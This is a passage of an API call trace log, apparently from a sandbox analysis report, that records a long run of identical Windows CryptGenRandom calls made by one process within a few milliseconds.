[0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 